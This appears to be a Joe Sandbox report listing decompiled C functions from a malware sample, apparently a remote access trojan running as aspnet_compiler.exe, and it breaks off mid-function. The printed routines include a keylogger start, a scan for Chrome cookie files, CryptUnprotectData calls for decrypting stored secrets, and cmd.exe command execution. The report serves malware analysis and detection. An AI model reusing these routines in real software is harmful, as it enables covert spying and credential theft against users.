                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                • API String ID: 2506810119-572611079
                • Opcode ID: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                • Instruction ID: c557cc44e93a4f3526c8424d226de774fcc48449be6b5aaf792980d9704e92f2
                • Opcode Fuzzy Hash: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                • Instruction Fuzzy Hash: 663173B5E01258EFEB21DB99D88199FBBBCEB44314F10406BF80897221D6749A818799
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041B35B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E0041B35B(void* __ecx, void* __edx) {
				void* __ebx;
				char* _t10;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t32;
				void* _t34;

				_t21 = __edx;
				_t24 = __edx;
				_t12 = __ecx;
				if(_t12 == 0) {
					_push(1);
					_t28 = _t27 - 0x18;
					_t10 = "0";
					E00402073(_t10, _t28, __edx, _t26, _t10);
					_t25 = "Control Panel\\Desktop";
					_push("WallpaperStyle");
					_t22 = "Control Panel\\Desktop";
					E00412A57(_t28, "Control Panel\\Desktop");
					_push(1);
					_t14 = _t28 + 0x20 - 0x18;
					_push(_t10);
					goto L11;
				} else {
					_t15 = _t12 - 1;
					if(_t15 == 0) {
						_push(1);
						_t32 = _t27 - 0x18;
						_t16 = _t32;
						_push("2");
						goto L7;
					} else {
						_t17 = _t15 - 1;
						if(_t17 == 0) {
							_push(1);
							_t32 = _t27 - 0x18;
							_t16 = _t32;
							_push("10");
							goto L7;
						} else {
							_t18 = _t17 - 1;
							if(_t18 == 0) {
								_push(1);
								_t32 = _t27 - 0x18;
								_t16 = _t32;
								_push("6");
								L7:
								E00402073(_t10, _t16, _t21, _t26);
								_t25 = "Control Panel\\Desktop";
								_push("WallpaperStyle");
								_t22 = "Control Panel\\Desktop";
								E00412A57(_t16, "Control Panel\\Desktop");
								_push(1);
								_t14 = _t32 + 0x20 - 0x18;
								_push("0");
								goto L11;
							} else {
								if(_t18 == 1) {
									_push(1);
									_t34 = _t27 - 0x18;
									E00402073(_t10, _t34, __edx, _t26, "0");
									_t25 = "Control Panel\\Desktop";
									_push("WallpaperStyle");
									_t22 = "Control Panel\\Desktop";
									E00412A57(_t34, "Control Panel\\Desktop");
									_push(1);
									_t14 = _t34 + 0x20 - 0x18;
									_push("1");
									L11:
									E00402073(_t10, _t14, _t22, _t26);
									E00412A57(_t14, _t25);
								}
							}
						}
					}
				}
				return SystemParametersInfoW(0x14, 0, _t24, 3);
			}

















                0x0041b35b
                0x0041b35e
                0x0041b360
                0x0041b363
                0x0041b407
                0x0041b409
                0x0041b40c
                0x0041b414
                0x0041b419
                0x0041b41e
                0x0041b423
                0x0041b425
                0x0041b42d
                0x0041b432
                0x0041b434
                0x00000000
                0x0041b369
                0x0041b369
                0x0041b36c
                0x0041b3f9
                0x0041b3fb
                0x0041b3fe
                0x0041b400
                0x00000000
                0x0041b372
                0x0041b372
                0x0041b375
                0x0041b3eb
                0x0041b3ed
                0x0041b3f0
                0x0041b3f2
                0x00000000
                0x0041b377
                0x0041b377
                0x0041b37a
                0x0041b3b8
                0x0041b3ba
                0x0041b3bd
                0x0041b3bf
                0x0041b3c4
                0x0041b3c4
                0x0041b3c9
                0x0041b3ce
                0x0041b3d3
                0x0041b3d5
                0x0041b3dd
                0x0041b3e2
                0x0041b3e4
                0x00000000
                0x0041b37c
                0x0041b37f
                0x0041b385
                0x0041b387
                0x0041b391
                0x0041b396
                0x0041b39b
                0x0041b3a0
                0x0041b3a2
                0x0041b3aa
                0x0041b3af
                0x0041b3b1
                0x0041b435
                0x0041b435
                0x0041b441
                0x0041b446
                0x0041b37f
                0x0041b37a
                0x0041b375
                0x0041b36c
                0x0041b459

                APIs
                • SystemParametersInfoW.USER32 ref: 0041B450
                  • Part of subcall function 00412A57: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                  • Part of subcall function 00412A57: RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                  • Part of subcall function 00412A57: RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateInfoParametersSystemValue
                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                • API String ID: 4127273184-3576401099
                • Opcode ID: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                • Instruction ID: 353071605875722e2d2290b0d1df67e202755458c4192b98c6391b796ea34086
                • Opcode Fuzzy Hash: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                • Instruction Fuzzy Hash: 96114D32F8061036D918317A4E1BBAE28068786F50F55815FFB013A2C6E5CF5AB143CF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040BB66 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E0040BB66(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t22;
				int _t32;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edx;
				_t40 = __ebx;
				_t63 = __ecx;
				E0040BEC3(__ecx);
				E0040BA3D(__ebx,  &_v52, _t59, __ecx, __eflags);
				E004087F0( &_v28,  &_v52, _t67, L"User Data\\Default\\Network\\Cookies");
				_t22 = PathFileExistsW(E00401EE4( &_v28));
				_t69 = _t22;
				if(_t22 != 0) {
					E0040BE24(__ebx, _t63, _t67, _t69,  &_v28);
				}
				E00401EF3( &_v28,  &_v52, _t64, E004087F0( &_v76,  &_v52, _t67, L"User Data\\Profile ?\\Network\\Cookies"));
				E00401EE9();
				_t66 = 1;
				do {
					_push(E0041A762(_t40,  &_v76, _t66));
					E0040BECD(E0040245C() - 0x11,  &_v76);
					E00401EE9();
					_t32 = PathFileExistsW(E00401EE4( &_v28));
					_t71 = _t32;
					if(_t32 != 0) {
						E0040BE24(_t40, _t63, _t67, _t71,  &_v28);
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x64);
				E00401EE9();
				E00401EE9();
				return _t63;
			}
















                0x0040bb66
                0x0040bb66
                0x0040bb6e
                0x0040bb70
                0x0040bb78
                0x0040bb88
                0x0040bb97
                0x0040bb9d
                0x0040bb9f
                0x0040bba7
                0x0040bba7
                0x0040bbc1
                0x0040bbc9
                0x0040bbd0
                0x0040bbd1
                0x0040bbdb
                0x0040bbec
                0x0040bbf4
                0x0040bc02
                0x0040bc08
                0x0040bc0a
                0x0040bc12
                0x0040bc12
                0x0040bc17
                0x0040bc18
                0x0040bc20
                0x0040bc28
                0x0040bc34

                APIs
                  • Part of subcall function 0040BA3D: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D), ref: 0040BA70
                • PathFileExistsW.SHLWAPI(00000000), ref: 0040BB97
                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040BC02
                Strings
                • User Data\Default\Network\Cookies, xrefs: 0040BB7D
                • User Data\Profile ?\Network\Cookies, xrefs: 0040BBAC
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                • API String ID: 1174141254-1980882731
                • Opcode ID: 7dd47be56250a5faee074aa80a38bd63018c82ec96d504af74951610f8248316
                • Instruction ID: d3bd7a9e1c96093492625e3e5ee86b1017f979b14bb93b73e7de0ea03ad3c358
                • Opcode Fuzzy Hash: 7dd47be56250a5faee074aa80a38bd63018c82ec96d504af74951610f8248316
                • Instruction Fuzzy Hash: F521E2719101195ACB04F7A6DC96CEEB7B8EE50718B44003FF901B21E2EF789946C6DC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040A461 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E0040A461(void* __ecx, void* __edx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				void* _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t38 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402073(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
					_t34 = _t33 - 0x18;
					E0041A7B9(_t33 - 0x18,  &_v28);
					E0040A6DA(_t18, _t31, _t38);
					E00401FB8();
					E00402073(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
					E00402073(_t18, _t34,  &_v28, _t32, "i");
					E0041A04A(_t18, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040986A, _t31, 0, 0);
						}
						CreateThread(0, 0, E0040988C, _t31, 0, 0);
					}
					return CreateThread(0, 0, E00409898, _t31, 0, 0);
				}
				return _t7;
			}












                0x0040a469
                0x0040a46c
                0x0040a470
                0x0040a47b
                0x0040a483
                0x0040a488
                0x0040a490
                0x0040a497
                0x0040a49f
                0x0040a4aa
                0x0040a4b9
                0x0040a4be
                0x0040a4d1
                0x0040a4d5
                0x0040a4e1
                0x0040a4e1
                0x0040a4ed
                0x0040a4ed
                0x00000000
                0x0040a4f9
                0x0040a501

                APIs
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • CreateThread.KERNEL32 ref: 0040A4E1
                • CreateThread.KERNEL32 ref: 0040A4ED
                • CreateThread.KERNEL32 ref: 0040A4F9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$LocalTime$wsprintf
                • String ID: Online Keylogger Started
                • API String ID: 112202259-1258561607
                • Opcode ID: b5ce605152c48d04b1b9bb0a80f2cf9395598435e1e11e2bbee5f5a778ef834b
                • Instruction ID: 2918f94b29e643706cc8194107c31a37d0557916cfe4d3346365f420470abdd0
                • Opcode Fuzzy Hash: b5ce605152c48d04b1b9bb0a80f2cf9395598435e1e11e2bbee5f5a778ef834b
                • Instruction Fuzzy Hash: 4501A1A5A003083EE62076769C8ADBF7A6CCA92398F40057FF545222C3D9BD1D5582FA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004060D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E004060D7(intOrPtr __ecx, char __edx, char* _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				_Unknown_base(*)()* _t11;
				intOrPtr _t18;
				intOrPtr _t24;
				char* _t26;
				void* _t29;
				char* _t32;

				_t11 =  *0x470af4; // 0x0
				_v16 = __ecx;
				_v20 = __edx;
				if(_t11 == 0) {
					_t11 = GetProcAddress(LoadLibraryA("crypt32"), "CryptUnprotectData");
					 *0x470af4 = _t11;
				}
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *_t11() == 0) {
					return 0;
				} else {
					_t24 = _v12;
					_t26 = _a4;
					if(_t24 == 0) {
						L7:
						 *((char*)(_t24 + _t26)) = 0;
						return _v12;
					}
					_t32 = _t26;
					_t29 = _v8 - _t26;
					_t18 = _t24;
					do {
						 *_t32 =  *((intOrPtr*)(_t29 + _t32));
						_t32 = _t32 + 1;
						_t18 = _t18 - 1;
					} while (_t18 != 0);
					goto L7;
				}
			}













                0x004060dd
                0x004060e2
                0x004060e5
                0x004060ea
                0x004060fd
                0x00406103
                0x00406103
                0x0040610b
                0x0040610e
                0x0040610f
                0x00406110
                0x00406111
                0x00406112
                0x00406116
                0x0040611b
                0x00000000
                0x0040611d
                0x0040611d
                0x00406120
                0x00406125
                0x00406141
                0x00406141
                0x00000000
                0x00406145
                0x0040612d
                0x0040612f
                0x00406131
                0x00406133
                0x00406136
                0x00406138
                0x00406139
                0x00406139
                0x00000000
                0x00406140

                APIs
                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,0040609F,?), ref: 004060F6
                • GetProcAddress.KERNEL32(00000000), ref: 004060FD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: CryptUnprotectData$crypt32
                • API String ID: 2574300362-2380590389
                • Opcode ID: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                • Instruction ID: beb262a90158fb4cf50087408c2c088a9110264107d79c3b72559a6e192aff88
                • Opcode Fuzzy Hash: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                • Instruction Fuzzy Hash: 75012831A04315ABCF18CFACDC409ABBBB8EF54300F0002BEE956E7341D675D9008798
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E0040513C() {
				void* __ebx;
				void* __ecx;
				long _t19;
				void* _t24;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;
				intOrPtr _t40;

				_t31 = _t24;
				 *((intOrPtr*)(_t31 + 0x78)) = 0;
				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
					L3:
					 *((char*)(_t31 + 0x5c)) = 0;
					_t40 =  *0x470d48; // 0x0
					if(_t40 != 0) {
						_t34 = _t33 - 0x18;
						E00402073(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
						E00402073(0, _t34 - 0x18, _t29, _t32, "E");
						E0041A04A(0, _t30);
					}
					E00404E06(_t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
					_t28 =  *((intOrPtr*)(_t31 + 0x78));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t31 + 0x60));
				 *(_t31 + 0x60) = 0;
				 *((char*)(_t31 + 0x5c)) = 0;
				SetEvent( *(_t31 + 0x64));
				return 0;
			}














                0x0040513f
                0x00405143
                0x00405149
                0x00405168
                0x00405168
                0x0040516b
                0x00405171
                0x00405173
                0x0040517d
                0x0040518c
                0x00405191
                0x00405196
                0x0040519b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040514b
                0x0040514b
                0x00405153
                0x00405159
                0x0040515c
                0x00405161
                0x00000000
                0x00000000
                0x00405166
                0x00000000
                0x00000000
                0x00000000
                0x00405166
                0x004051aa
                0x004051b3
                0x004051b6
                0x004051b9
                0x00000000

                APIs
                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                • CloseHandle.KERNEL32(?), ref: 004051AA
                • SetEvent.KERNEL32(?), ref: 004051B9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEventHandleObjectSingleWait
                • String ID: Connection Timeout
                • API String ID: 2055531096-499159329
                • Opcode ID: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                • Instruction ID: 87dc7bd1a7f2c12f2d5d2db554b8500d969d653d79ad8885273b8c0985c03cd0
                • Opcode Fuzzy Hash: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                • Instruction Fuzzy Hash: 1401F531A44B40AFE7226B36DC4551B7FD0FF01301700097FF18356AA2DA78A440CF5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040DCC9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                Download Yara Rule
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DD37
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 2005118841-1866435925
                • Opcode ID: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                • Instruction ID: c83b488e6c0b567c715bed89e41106fb5d46d583803a0575b5f187d309fe0aa3
                • Opcode Fuzzy Hash: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                • Instruction Fuzzy Hash: 5401D6B1E487087AE714EAD5CC13FBA77685F10705F50403FB906761C2EABC6549CA2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00415181 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00415181(void* __edx, void* __ebp, void* __eflags, char _a16, char _a52, void* _a76, char _a80, void* _a152, void* _a176) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040415E(0,  &_a80, __edx, __ebp, E00401F8B(E00401E45( &_a16, __edx, __ebp, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", E00401EE4(E004042DC(0,  &_a52, L"/C ", __ebp, _t41, _t11)), 0, 0);
				E00401EE9();
				E00401EE9();
				E00401E6D( &_a16, _t35);
				E00401FB8();
				E00401FB8();
				return 0;
			}




                0x00415181
                0x0041519b
                0x004151a1
                0x004151c3
                0x004151cd
                0x00415c96
                0x0041611c
                0x00416128
                0x00416134
                0x00416141

                APIs
                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151C3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExecuteShell
                • String ID: /C $cmd.exe$open
                • API String ID: 587946157-3896048727
                • Opcode ID: a54521aa5aa32059fc7229d534241737211c2f29cc6a196b20319429e6c9867f
                • Instruction ID: b910b50d10bf9c10a53822f7bfccbc49879064c70acfec78918e038c0e9cbf8d
                • Opcode Fuzzy Hash: a54521aa5aa32059fc7229d534241737211c2f29cc6a196b20319429e6c9867f
                • Instruction Fuzzy Hash: ADF012712083045AC314FBB2DC959AFB3E8AB90319F500C3FB546611E2EF389959C65A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040D4AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0040D4AA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00433BCB(__ecx, 0);
				E0040F09D(__ecx + 4);
				E0040F09D(__ecx + 0xc);
				E0040F087(__ecx + 0x14);
				E0040F087(__ecx + 0x1c);
				E0040F09D(__ecx + 0x24);
				E0040F09D(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040D455(_t49, "bad locale name");
					E004379F6( &_v16, 0x46cce0);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E00433F5E(_t66);
					E0040F082( &(_t66[0xb]));
					E0040F082( &(_t66[9]));
					E0040F082( &(_t66[7]));
					E0040F082( &(_t66[5]));
					E0040F082( &(_t66[3]));
					E0040F082( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E004441D1(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x470060 + _t34 * 0x18;
							__eflags = 0x470060 + _t34 * 0x18;
							return E00434470(0x470060 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E00433F13(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}









                0x0040d4b3
                0x0040d4b5
                0x0040d4bd
                0x0040d4c5
                0x0040d4cd
                0x0040d4d5
                0x0040d4dd
                0x0040d4e5
                0x0040d4ea
                0x0040d4ee
                0x0040d509
                0x0040d50c
                0x0040d51a
                0x0040d51f
                0x0040d520
                0x0040d521
                0x0040d524
                0x0040d52d
                0x0040d535
                0x0040d53d
                0x0040d545
                0x0040d54d
                0x0040d555
                0x0040d55a
                0x00433c23
                0x00433c25
                0x00433c27
                0x004441f9
                0x00433c2d
                0x00433c2d
                0x00433c30
                0x00433c35
                0x00433c35
                0x00000000
                0x00433c40
                0x00433c41
                0x00433c41
                0x0040d4f0
                0x0040d4f4
                0x0040d501
                0x0040d501

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 0040D4B5
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040D4F4
                  • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F32
                  • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F56
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D51A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                • String ID: bad locale name
                • API String ID: 3628047217-1405518554
                • Opcode ID: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                • Instruction ID: 7d5d85bd939eae65a08207342b5a69e68fd95b80f34b046828c98c3172fb135a
                • Opcode Fuzzy Hash: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                • Instruction Fuzzy Hash: 72F0A4314446049AC334FF61D853A9FB3689F14758F90453FF686228D7EF38AA0CC699
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412903 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00412903(void* __ecx, void* __edx, short* _a4, char _a8) {
				void* _v8;
				int _v12;
				char _v2060;
				void* __ebp;
				void* _t19;
				void* _t23;
				void* _t24;

				_t22 = __edx;
				_v12 = 0x400;
				_t23 = __ecx;
				if(RegOpenKeyExW(__edx, _a4, 0, 0x20019,  &_v8) != 0) {
					_push(0x46a8f0);
				} else {
					_t6 =  &_a8; // 0x40e830
					RegQueryValueExW(_v8,  *_t6, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040415E(_t19, _t23, _t22, _t24);
				return _t23;
			}










                0x00412903
                0x00412910
                0x00412922
                0x0041292d
                0x0041295c
                0x0041292f
                0x0041293e
                0x00412944
                0x0041294d
                0x00412959
                0x00412959
                0x00412963
                0x0041296e

                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                • RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                • RegCloseKey.ADVAPI32(?), ref: 0041294D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: 0@
                • API String ID: 3677997916-11155133
                • Opcode ID: 4ff219f190c783964b3da24bc40874c0d42c6defea26bc115919c49e29e698db
                • Instruction ID: c7fd1c892b01a83c80440586cf5eccaa6983c25e434fa7726a62adcc2e55f33b
                • Opcode Fuzzy Hash: 4ff219f190c783964b3da24bc40874c0d42c6defea26bc115919c49e29e698db
                • Instruction Fuzzy Hash: CCF0C275A0021CFBDB109B90EC45FDE7BBCEB04B11F1040B2BA04F5291DAB4AB949BD8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004013F2() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x4736e4 = _t2;
				return _t2;
			}




                0x00401403
                0x00401409
                0x0040140e

                APIs
                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                • GetProcAddress.KERNEL32(00000000), ref: 00401403
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: GetCursorInfo$User32.dll
                • API String ID: 1646373207-2714051624
                • Opcode ID: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                • Instruction ID: 339f5e680ac259f41fdaf7538df7a013b816c33a7b3ecda91f69a778ee4b915d
                • Opcode Fuzzy Hash: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                • Instruction Fuzzy Hash: 89B092B0585700ABC6007FB0BC0D9493A24A604703B1001B2B001A2672EB7991909E3F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401497() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x47379c = _t2;
				return _t2;
			}




                0x004014a8
                0x004014ae
                0x004014b3

                APIs
                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetLastInputInfo$User32.dll
                • API String ID: 2574300362-1519888992
                • Opcode ID: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                • Instruction ID: a235115c4c7ff8ecad93221cd3e986331959d115ecffc12b26486691d28a12a6
                • Opcode Fuzzy Hash: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                • Instruction Fuzzy Hash: 9BB092F05657009BCB402FA0BC0E9053B24A604713B208AB2B009A3162EB7D90909F2F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00448884 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 75%
                			E00448884(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
